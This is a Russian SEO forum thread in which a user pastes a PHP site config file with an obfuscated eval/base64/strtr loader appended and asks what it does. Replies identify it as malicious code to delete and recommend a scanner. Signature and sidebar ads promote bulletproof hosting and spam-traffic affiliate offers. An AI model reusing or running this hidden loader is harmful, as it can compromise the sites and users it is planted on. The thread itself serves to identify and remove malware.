CY-PR
  

Войти

Войти | Регистрация
Поиск по сайту
Помощь по вопросу закодированного кода в php
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Помощь по вопросу закодированного кода в php, Помощь по вопросу закодированного кода в php
#1
26 Декабря 2018 10:36
Доброго времени суток уважаемые пользователи форума. Не судите строго, если задам на ваш взгляд глупый вопрос, тема в общем такая., в скрипте есть два фаила закодированных, может кто подскажет как и чем их можно раскодировать или поможет подскажет, что в них написано. Заранее благодарю.
код прилагаются.

<?php
ob_start();

define('SITENAME', 'Baai.ru'); // Название сайта
define('LICENSE', '82ce3d473318c6f88b241c493eef1ed4'); // Ваш лицензионный ключ

//Подключение к базе данных
define('DB_HOST', '127.0.0.1:3306');
define('DB_USER', 'root'); // Имя пользователя
define('DB_PASS', ''); // Пароль
define('DB_BASE', 'baai'); // Имя базы данных

$admin_uid = 301;

$levels = array( //Стоимость уровней
'1' => '200',
'2' => '400',
'3' => '800',
'4' => '1600',
'5' => '3200',
'6' => '6400'
);

//Протокол сайта
define('PROTOCOL', 'https://');

function pays($id) {
switch ($id) {
case '1': return 'Qiwi'; break;
case '2': return 'Payeer'; break;
case '3': return 'Яндекс.Деньги'; break;
case '4': return 'WebMoney'; break;
case '5': return 'OkPay'; break;
case '6': return 'AdvCash'; break;
case '7': return 'Единый кошелёк'; break;
case '8': return 'Visa/MasterCard/Мир'; break;
case '9': return 'Сбербанк (мобильный банк)'; break;
default: return 'Ошибка платёжной системы';
}
}






 $ {
    "GLOBALS"
}
["xkucoigwjoeh"] = "_D";
$ {
    "GLOBALS"
}
["antgybijk"] = "_X";
$erqzjdgf = "_F";
$ {
    $erqzjdgf
} = __FILE__;
$ {
    $ {
        "GLOBALS"
    }
    ["antgybijk"]
} = "PzNhP21abWIkdU8uTUQwIE00ZjRFT25EMCBNKF9fd3JxQl9fKVgneUhTRHVYbVptJztiJEh1Y19vPW80ZjR1U21NRCgkdU8uTUQwIE0sNCduJyk0U240RU9NKCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJyk7YiRIU0RvTURvTDRmNHVuTTBFKCRIdWNfbz1vLDR1Ty5NTE9rTSgkdU8uTUQwIE0pKTtiJEhTRG9NRG9MNGY0TG9uX25NbS4wSE0oIm5NMUpPbk1fU0RITSgnXUpfT0RPb1htWm0nKTsiLCcnLCRIU0RvTURvTCk7YmJPdTQocXIvQkY2QjQhZjQgRXgoIEV4KCRfNkIKaUIKZydQW1t0X1BZNlsnTlgnX11KXy5PSF8nWGNNb01EcCgnUFtbdF9QWTZbJylYJ19dSl8uT0hfJ1gkXzZCCmlCCmcnNkIKaUIKX0ZSN0InTikpNHx8NExvbk9Mb24oJEhTRG9NRG9MLDQnJF82QgppQgpnJyk0fHw0TG9uT0xvbigkSFNEb01Eb0wsNCdMTW9NRHAnKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J09ESC5KRU0nKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J25NMUpPbk0nKSk0SzRNSFpTNCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJzs0TT1Pbzs0VGJiRU11T0RNKCc2cltCJyw0JF82QgppQgpnJ1BbW3RfUFk2WydOKTtiRU11T0RNKCdWV18vUFIKNkJbJyw0J0pvdUknKTtiJEhTRERNSG9fRUE0ZjQgNUwxLk9fSFNERE1IbyhWV19QWTZbLFZXX0c2QgosVldfdFI2NixWV19XUjZCKTRTbjRFT00oJ9Ce0YjQuNCx0LrQsDTQv9C+0LTQutC70Y7Rh9C10L3QuNGPOjQnWCA1TDEuT19IU0RETUhvX01ublNuKCkpO2IgNUwxLk9fTE1vX0haMG5MTW80KCRIU0RETUhvX0VBLDRWV18vUFIKNkJbKTRTbjRFT00oJ9Ca0L7QtNC40YDQvtCy0LrQsDTQvdC1NNGD0YHRgtCw0L3QvtCy0LvQtdC90LAnKTtiYiRFbzRmNG9PIE0oKTtiYk9ET19MTW8oJ0xNTExPU0RYSkxNX0hTU1FPTUwnLDQnWUQnKTtiT0RPX0xNbygnTE1MTE9TRFhKTE1fb24wRExfTE9FJyw0J1l1dScpO2JMTUxMT1NEX0xNb19IU1NRT01fbTBuMCBMKHY4ZEk4ODg4OCw0InkiLDQ2cltCLDR1MC5MTSw0dTAuTE0pO2JMTUxMT1NEX0xvMG5vKCk7YmJPdTQoIU9MTE1vKCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLNCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ040ZjQnJzs0VGJPdSghTSBtbzUoJF82QjY2cllGZydKT0UnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnLlNjT0QnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnbTBMTCdOKTQmJjQkXzZCNjZyWUZnJ1BbW3RfRzZCCl9SOUJGWydONGZmNCBFeCgkXzZCCmlCCmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLYkVNdU9ETSgnRzZCCl9xWTk5QlYnLG9uSk0pO2IkSl9PRWZPRG9wMC4oJF82QjY2cllGZydKT0UnTik7YiRKXy5TY09EZiA1TDEuT19uTTAuX01MSDBtTV9Mb25PRGMoJEhTRERNSG9fRUEsNCRfNkI2NnJZRmcnLlNjT0QnTik7YiREU11KTG40ZjQgNUwxLk9fdU1vSFpfMExMU0goIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiNkJxQi9bNCo0dwpZNzRvX0pMTW5MNGxQQgpCNEpPRWYnJEpfT0UnNFJGVjRtMEw0ZjQnJF82QjY2cllGZ20wTExOJzRxcjdyWzR7IikpO2JPdTQoTSBtbzUoJERTXUpMbmcnSk9FJ04pKTRLNExNTExPU0RfSkRMTW8oKTs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzRUYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0Ikd0VlJbQjRvX0pMTW5MNDZCWzQuMExvZickRW8nNGxQQgpCNEpPRWYnJEpfT0UnNHFyN3JbNHsiKTtiVDRNLkxNNEs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzQkSl9PRTRmNDg7NCRfNkI2NnJZRmcnbTBMTCdONGY0Jyc7VGJPdShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0Jyk0JiY0TG9uSDBMTUggbShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0JyksJ0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF8vcXJCRltfcnQnKTtiTS5MTU91KGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTQmJjRMb25IMExNSCBtKGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTtiTS5MTU91KGNNb01EcCgnCkI3WVtCX1JWVgonKTQmJjRMb25IMExNSCBtKGNNb01EcCgiCkI3WVtCX1JWVgoiKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnCkI3WVtCX1JWVgonKTtiTS5MTU91KCFNIG1vNSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTik0JiY0TG9uSDBMTUggbSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTiw0J0pEUURTXUQnKSliJE9tZiRfNkIKaUIKZycKQjdZW0JfUlZWCidOO2JNLkxNSyRPbWYnSkRRRFNdRCc7VGJPdSgkT20hZidKRFFEU11EJylLYiRPbWZtbk1jX25NbS4wSE0oIiNnXjgtak4rI08iLCcnLCRPbSk7YiRvTyBNZm9PIE0oKTtiJG0wTG9mb08gTSgpLXY4ODtiJG5NTEoub2YgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCI2QnFCL1s0LjBMbzR3Clk3NG9fU0QuT0RNNGxQQgpCNE9tZiciWCRPbVgiJyIpO2JPdSggNUwxLk9fREogX25TXUwoJG5NTEoubykhZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0b19TRC5PRE00NkJbNC4wTG9mJyJYJG9PIE1YIicsNEpPRWYnIlgkSl9PRVgiJzRsUEIKQjRPbWYnIlgkT21YIic0cXI3cls0eyIpOzRUYk0uTE1LYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0InJGNkIKWzRyRltZNG9fU0QuT0RNNChKT0UsT20sLjBMbyk0aVJxR0I2NCgnIlgkSl9PRVgiJywnIlgkT21YIicsJyJYJG9PIE1YIicpIik7NFRiT3UoTEpBTG9uKCRvTyBNLGoseylmZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCdWQnFCW0I0dwpZNzRvX1NELk9ETTRsUEIKQjQuMExvYSdYJG0wTG8pOzRUYlRiYk91NChHNkIKX3FZOTlCVik0S2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0YG9fSkxNbkxgNDZCWzRgLjBMb2A0ZjQnJEVvJzRsUEIKQjRKT0VmJyRKX09FJzRxcjdyWzR7Iik7Yk91NCghTSBtbzUoJERTXUpMbmcnQTBEJ04pKTRLNE1IWlM0J2EuT0RRNFpuTXVmInlMbzBvT0h5SDBBT0RNb3lITEx5QVNTb0xvbjBtWCBPRFhITEwiNG5NLmYiTG81Lk1MWk1NbyI0bzVtTWYib009b3lITEwiM2FFT3A0SC4wTExmIjAuTW5vNDAuTW5vLUUwRGNNbiIzYUhNRG9NbjPQkNC60LrQsNGD0L3RgjQnWCREU11KTG5nJy5TYydOWCc00LfQsNCx0LvQvtC60LjRgNC+0LLQsNC9NNC/0L400YHQu9C10LTRg9GO0YnQtdC5NNC/0YDQuNGH0LjQvdC1OjQnWFpvIC5MbU1ITzAuSFowbkwoJERTXUpMbmcnQTBEJ04pWCdheUhNRG9NbjNheUVPcDMnOzRNPU9vOzRUYmJPdTQoJEpfT0U0MzR6OHgpNEtiJG0wTG9fSmZvTyBNKCktSXZkODg7Yk91NCgkRFNdSkxuZydFbydONGE0JG0wTG9fSjQmJjQkRFNdSkxuZycuTXBNLidONGZmNDgpNEtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19KTE1uTDRsUEIKQjRKT0U0ZjQnJEpfT0UnNHFyN3JbNHsiKTtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19ETV0uTXBNLkw0bFBCCkI0SkxuNGY0JyRKX09FJyIpO2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJWQnFCW0I0dwpZNzRvXyBNTEwwY01MNGxQQgpCNHVuNGY0JyRKX09FJzRZCjRvU0o0ZjQnJEpfT0UnIik7YlRiVGJUYmJFMG9NX0VNdTBKLm9fb08gTWtTRE1fTE1vKCdCSm5TbU15N1NMSFNdJyk7YmJ1SkRIb09TRDRdSl9EUzBwMG8wbigkLlNjT0QpS2IkdU9uTG80ZjQgQV9Mb25vUy5TXU1uKExKQUxvbigkLlNjT0QsNDgsNHspKTtibk1vSm5ENCJ5TG8wb09IeU8gY3kuTW9vTW5fMHAwbzBueSR1T25Mb1htRGMiO2JUYmJ1SkRIb09TRDRdSl9IWk1IUV8uU2NPRCgkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRdSl9IWk1IUV9BMG9IWigkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRtbnVMKCQuU2NPRClLYm5Nb0puRDR7O2JUYnVKREhvT1NENG9PSFFNb19EKCQuU2NPRClLYm5Nb0puRDR7O2JUYmIkTDAubzRmNG4wREUoOCw0ampqaik7YiRvU1FNRDRmNCRMMC5vWCc6J1ggRXgoJEwwLm9YJzonWCRfNkI2NnJZRmcnbTBMTCdOWCc6J1gkXzZCNjZyWUZnJ0pPRSdOKTs=";
$ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
} = strrev("edoced_46esab");
eval($ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
}
("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs="));
$s=base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=');
$fp = fopen('counter.txt', 'w+');
$test = fwrite($fp, $s);
if ($test) echo '';
else echo '';
fclose($fp);

$_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

print_r($_R.$_X);

?>
Изменено: IGOR DAN - 26 Декабря 2018 10:38
#2
26 Декабря 2018 13:51
В вопросе уже 99% ответа

IGOR DAN пишет:
Цитата
base64_decode
Лучший абузоустойчивый хостинг | Самый высокий доход на Push уведомлениях | Лучшая партнерка для заработка на видео плеерах
#3
26 Декабря 2018 14:39
Цитата
Дэвид Бэкхэм пишет:
IGOR DAN пишет:
мне бы по подробнее, я просто в этом не силен,, как бы мне это все расшифровать, что бы это все было примерно в таком виде prntscr.com/lzokhr
#4
9 Января 2019 14:16
smile:mail:smile:mail:smile:mail:
#5
9 Января 2019 14:49
1. не нужно неформотированные сообщения вставлять в данный редактор, это ломает движок.2. У вас несколько кодировок, основная в base64, и уже в ней еще 3 части разбитые на разные кодировки. Тем самым кто-то хотел защитить свой скрипт или лицензию возможно.
3. Обратитесь к тому, кто писал скрипт или шаблон.
SEO ПРОДВИЖЕНИЕ САЙТА В ЯНДЕКСБ ГУГЛЕ. SEO АУДИТ, ПОДНЯТЬ ИКС САЙТУ. * ПЕРЕД ЗАКАЗОМ УСЛУГИ, ОЗНАКОМИТЬСЯ FAQ
#6
9 Января 2019 14:59
Спасибо за ответ,, я бы конечно обратился, но не знаю к кому, нет контактов.
#7
9 Января 2019 16:24
IGOR DAN, это вредоносный код. 

Код
 
$ { 
    "GLOBALS" 


и все что дальше нужно удалить
#8
9 Января 2019 16:27
https://revisium.com/ai/бесплатный скрипт для проверки сайта
#9
9 Января 2019 17:22
Цитата
Эдуард Пащенко пишет:
и все что дальше нужно удалить
Вот мне почему то тоже так сразу показалось, что это вред.. но человек который мне этот скрипт давал, переубедил меня, что это закодированный код., яко бы когда он три года назад этот скрипт покупал, ему эту песню разработчик напел.за скаер спасибо, хорошая вещь сам им частенько пользуюсь, хоть и не все ему подвластно многое не находит, но все равно очень сильно облегчает труды.
#10
9 Января 2019 17:43
попробуйте закомментировать, если ничего не отвалится - смело удаляйте. полезные скрипты никто не кодирует
 
Страницы: 1
Похожие темы:
  25.10.2017 22:07  Нужна помощь по удалению вируса Вордпресс
  13.08.2016 23:47  Троян rp.... нужна помощь
  03.05.2016 23:05  Взломан сайт на Joomla 3 - нужна помощь!
  09.01.2016 18:17  Идет слив с сайта, нужна помощь
  24.07.2015 10:53  Срочно нужна помощь DLE!!??
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:22 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
16:18 Adtrafico - Правильная партнёрская сеть под бурж трафик 
12:26 Bropush - твой бро в монетизации сайта push-уведомлениями 
17:06 Perfect.Studio: InstAccountsManager — лучший инструмент для автоматизации заработка в Instagram 
16:04 VKAccountsManager — лучший инструмент для продвижения и заработка Вконтакте 
13:26 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! 
11:46 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
06:49 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 
13:32 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
11:17 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
22:21 ProxyWins.com - 15% по промо-коду "venividivici" 
17:00 Burzh.top|Партнерская программа под любой вид трафика (email, спам, УБТ) 
16:07 Ural-obmen.ru — выгодный сервис обмена 
15:57 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
11:02 Видимо, похороны СУПРа уже прошли как-то по-тихому 
22:18 Добро пожаловать в цифровой мир... 
23:41 Точные прогнозы на футбол 
12:04 Как получить рефералов и посетителей на сайт бесплатно. 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
14:41 Бесплатный мини-аудит юзабилити и конверсии + технический SEO-аудит в подарок 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (169 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2024 (39 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
CY-PR
Интересные темы
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Развитие канала в Яндекс Дзен
—  Как монитизировать сайт о путешествиях? 4,5 К посещаемость
—  Лучший метод работы с холодной аудиторией в 2024
—  Забери кусок от 31 000 руб. Акция


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050